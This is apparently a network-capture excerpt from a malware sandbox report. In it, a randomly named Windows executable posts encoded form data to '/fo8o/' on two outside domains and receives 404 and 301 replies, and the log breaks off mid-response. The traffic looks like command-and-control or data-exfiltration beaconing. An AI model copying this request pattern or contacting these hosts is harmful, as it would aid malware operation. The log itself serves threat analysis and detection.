Jun 26, 2024 14:55:40.763247013 CEST	360	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:55:40 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	65215	202.172.28.202	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:55:42.522666931 CEST	801	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4b 5a 72 6c 52 67 5a 6e 67 57 64 73 44 35 32 6e 7a 57 4c 39 67 41 53 68 42 78 56 6e 79 51 45 74 35 72 53 55 34 69 6d 36 6c 68 38 71 66 79 69 6e 77 68 47 74 4a 4f 31 47 62 49 4d 4c 68 67 6f 42 69 70 58 65 67 55 46 2b 53 68 63 32 75 4f 6d 57 45 70 6a 35 6f 58 71 59 57 53 79 67 41 74 4d 50 2b 68 7a 47 74 66 43 58 30 50 61 42 45 41 32 67 4a 48 61 44 4f 48 6d 52 31 50 77 32 41 35 34 68 4a 59 2f 45 42 46 33 55 41 2f 2f 4d 77 57 50 7a 7a 6f 69 50 62 64 69 4d 64 56 51 42 6a 31 6e 33 4a 45 66 74 32 58 61 41 2b 64 63 58 38 4a 67 4f 44 63 4b Data Ascii: Y8F=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/KZrlRgZngWdsD52nzWL9gAShBxVnyQEt5rSU4im6lh8qfyinwhGtJO1GbIMLhgoBipXegUF+Shc2uOmWEpj5oXqYWSygAtMP+hzGtfCX0PaBEA2gJHaDOHmR1Pw2A54hJY/EBF3UA//MwWPzzoiPbdiMdVQBj1n3JEft2XaA+dcX8JgODcK
Jun 26, 2024 14:55:43.354536057 CEST	360	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:55:43 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	65216	202.172.28.202	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:55:45.053260088 CEST	1818	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4a 35 72 6c 6a 6f 5a 6d 48 43 64 2b 54 35 32 6b 7a 57 62 39 67 42 4f 68 46 64 5a 6e 79 55 36 74 36 54 53 57 62 36 6d 72 77 56 38 35 2f 79 69 34 41 68 46 77 5a 4f 67 47 62 59 41 4c 67 51 6f 42 69 70 58 65 6c 51 46 39 48 64 63 37 4f 4f 6c 58 45 70 6b 39 6f 58 43 59 57 72 4b 67 41 35 63 4d 4b 74 7a 46 4e 50 43 55 47 6e 61 48 55 41 30 6a 4a 47 48 44 4f 4c 48 52 31 54 38 32 41 4e 65 68 4c 49 2f 41 58 64 75 46 43 7a 61 5a 47 4f 43 68 30 6b 56 4e 50 56 79 48 2b 4a 37 4b 6a 68 4a 72 62 51 53 6f 77 33 6e 57 61 59 70 4f 4c 64 62 47 57 4e 35 33 62 36 78 63 2f 71 49 46 6a 49 4d 77 72 79 48 7a 4c 57 51 75 78 6f 61 55 55 4a 6f 6d 4f 45 51 35 34 79 4b 39 63 42 55 6e 31 47 63 4e 34 31 46 70 2f 44 4d 73 43 38 44 4e 6c 7a 54 73 71 6c 33 59 58 64 63 4f 77 63 70 73 52 61 73 61 62 4b 43 68 56 70 64 4e 75 45 7a 66 59 53 7a 74 41 47 48 49 6d 65 76 6a 77 69 71 35 39 51 79 4e 64 36 32 62 69 [TRUNCATED] Data Ascii: Y8F=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/J5rljoZmHCd+T52kzWb9gBOhFdZnyU6t6TSWb6mrwV85/yi4AhFwZOgGbYALgQoBipXelQF9Hdc7OOlXEpk9oXCYWrKgA5cMKtzFNPCUGnaHUA0jJGHDOLHR1T82ANehLI/AXduFCzaZGOCh0kVNPVyH+J7KjhJrbQSow3nWaYpOLdbGWN53b6xc/qIFjIMwryHzLWQuxoaUUJomOEQ54yK9cBUn1GcN41Fp/DMsC8DNlzTsql3YXdcOwcpsRasabKChVpdNuEzfYSztAGHImevjwiq59QyNd62bitKpXw4Rg4jW10WzlGrck9QbkLhOrwwFuohgJWuuRqDV8voiIwA29At+yaUGM6yP6vu/0a+4CZFGE11s0B26YXjF//VH3i5bdFjKUb3A20hS3j0T0CCq9YLRVVKtl1oU8j6UHNpmM4oz9Er01tsuaeUjxLRCB1w84PExCaXE7jb1XkDCHd9EK4WthUtVTh89vZWx0KsP/FXW34R8C+k7tgBa2J/Y0eWo53WPxM6Rk645nfAQyaRy1hGK2pKWbHo6y/s8DfpxP80Kb8it05P2F8enU3hgmLBgzr7GvZSxJunni/FbAymEaTiYVQfmgSXq99cZ76AIASeWMHjW/8LJdKb9Jm4BQuv9GRC8CXNo4vrZ9InyWuWR/iph/tUGB5lWEfVrH5eKoUxXkELQmAsHzlTaUE7TovkiSqNa/+eElMxNCBpuRvVlR9i1tHAwFrK2lzPv5cB6vcIEq7pDOoZIFkUTHbX1PJYMmV5Snxc3aEm2KwZE3F38bdFpfo99gYj76X22riFCwnxVafb55oq+SNf2DPczZon++pNp2vve/wNHyG700fxGhVFXf/l69XEDvJJ9jPySR1Hbm3Z/YtJmD4rBYWHxdbRQKdJcfs4UtM73s4SVtPl6k5OQnMWo74AyL/Zmy7d01X8cmvGMsy6AFwLv5dtC78HfgEv [TRUNCATED]
Jun 26, 2024 14:55:45.831783056 CEST	360	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:55:45 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	65217	202.172.28.202	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:55:47.585500002 CEST	518	OUT	GET /fo8o/?Y8F=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8tsmJ5wYjg7yHR75gTEM7bFlUHlp6xhVA3OjEJ21e5ZGGZA==&9brL_=BThPe0S0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.kasegitai.tokyo Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 26, 2024 14:55:48.360296011 CEST	360	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:55:48 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	65219	116.50.37.244	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:55:53.586302042 CEST	799	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d Data Ascii: Y8F=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
Jun 26, 2024 14:55:54.466495037 CEST	599	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/ Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Wed, 26 Jun 2024 12:55:53 GMT Connection: close Content-Length: 156 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	65220	116.50.37.244	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:55:56.122221947 CEST	819	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 48 69 45 6d 77 72 59 70 37 6d 4c 31 38 6b 36 41 73 61 6a 77 35 2b 79 65 78 79 78 34 52 73 72 55 72 4f 70 64 44 34 Data Ascii: Y8F=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwHiEmwrYp7mL18k6Asajw5+yexyx4RsrUrOpdD4
Jun 26, 2024 14:55:57.062661886 CEST	599	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/ Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Wed, 26 Jun 2024 12:55:56 GMT Connection: close Content-Length: 156 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	65221	116.50.37.244	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:55:58.663039923 CEST	1836	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 32 4e 5a 54 68 6e 6e 4c 6d 38 30 4d 2f 75 45 57 32 34 4a 38 33 59 2f 75 7a 5a 41 38 72 41 79 36 5a 78 35 31 77 37 47 6f 59 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 78 4e 46 47 67 41 5a 64 49 78 6b 61 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a 4a 4a [TRUNCATED] Data Ascii: Y8F=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL2NZThnnLm80M/uEW24J83Y/uzZA8rAy6Zx51w7GoYSYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldxNFGgAZdIxkafgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB3wpOPRMSckz22D7oIJ1pT3kmt5OAzJQX0rpd4H1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7r8VUpMLRkY6c3P8G0fpnTUDkLQscQKtCpBC0WjC/PZq9AVPUPhBBD5/Dig7vxPgCc2pVcvipTzijVIvgKAdFC7i2pC8gbNWoNVRZMX415Goc9ACqxlKDTbGvtkaduGagDzKCszB0YP2v04KI092MQf7ousTmtftOjO7F0nipoP+ae415ShjaJt52G5Y6AFhRSUFLstJAda1ItR8M9j/L3g9nYAAaYrZcsa4vZMQvEH+ZAtHeztq24kQbanf5ovMXFmxG2hPDmBOxYxWsGXxwqxAE4UChtzmKyovtMK56OZLEgKSJviIqU3z0dUvGszLNpCkWZsAqG3JpcHhuqqwQv6sb+TG8VHQhAkXO4dCk+vc59h2hhsQCETtYQj2hDGYgZtAbx5kvk5+K7Gl1SaKXYmnS6DbpM5fRwWGzllkVCSq+ddNwmCqpgcn42aU+9x/xCJsUgMK3AP/fEJ4db0U1RRo7K/TxrU/5+U+u6hHJplkdFUrMBIcY0SOK4eWxpJ3wpdR7JATPJiykjxVFix [TRUNCATED]
Jun 26, 2024 14:55:59.544312954 CEST	599	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/ Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Wed, 26 Jun 2024 12:55:58 GMT Connection: close Content-Length: 156 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	65222	116.50.37.244	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:56:01.194468975 CEST	524	OUT	GET /fo8o/?Y8F=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==&9brL_=BThPe0S0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.goldenjade-travel.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 26, 2024 14:56:02.081085920 CEST	907	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/?Y8F=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==&9brL_=BThPe0S0 Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Wed, 26 Jun 2024 12:56:00 GMT Connection: close Content-Length: 312 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 3f 59 38 46 3d 4c 46 4b 71 79 72 63 75 37 67 31 4e 43 61 38 63 56 31 72 32 74 4e 6b 6f 68 72 